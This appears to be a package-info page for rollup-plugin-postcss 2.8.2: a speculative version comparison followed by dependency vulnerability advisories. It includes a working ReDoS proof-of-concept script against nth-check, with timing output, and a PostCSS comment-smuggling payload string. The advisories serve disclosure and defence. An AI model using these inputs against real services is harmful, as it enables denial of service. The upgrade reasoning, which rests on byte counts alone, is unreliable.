Rollup-plugin-postcss offers seamless integration between Rollup and PostCSS, streamlining CSS processing within your JavaScript builds. Version 2.8.2, released shortly after 2.8.1, provides a minor update with potentially impactful refinements. Analyzing the changes, the core functionalities, dependencies, and development dependencies remain consistent between the two versions, suggesting a focus on bug fixes or subtle improvements. Both versions utilize established tools like cssnano for CSS optimization, postcss-modules for modular CSS, and style-inject for injecting styles into the DOM.
The key difference lies in the dist section, specifically the unpackedSize. Version 2.8.2 has a slightly larger unpacked size (38155 bytes) compared to 2.8.1 (37934 bytes). This increase implies that developers may have introduced minimal refinements to improve overall stability or introduce micro-optimizations. The consistent dependency and devDependency list indicates that the core functionality and the framework for development and testing stay the same.
For developers using this plugin, upgrading to 2.8.2 is recommended. Consider it especially when encountering edge-case scenarios or stability issues with older versions. Developers should review the changelog (if available on their repository) to fully comprehend the specific fixes and improvements. Given the minor version bump, the update process should be straightforward, with no significant API changes expected. Regular updates will ensure code compatibility with other tools included in the workflow.
All the vulnerabilities related to the version 2.8.2 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.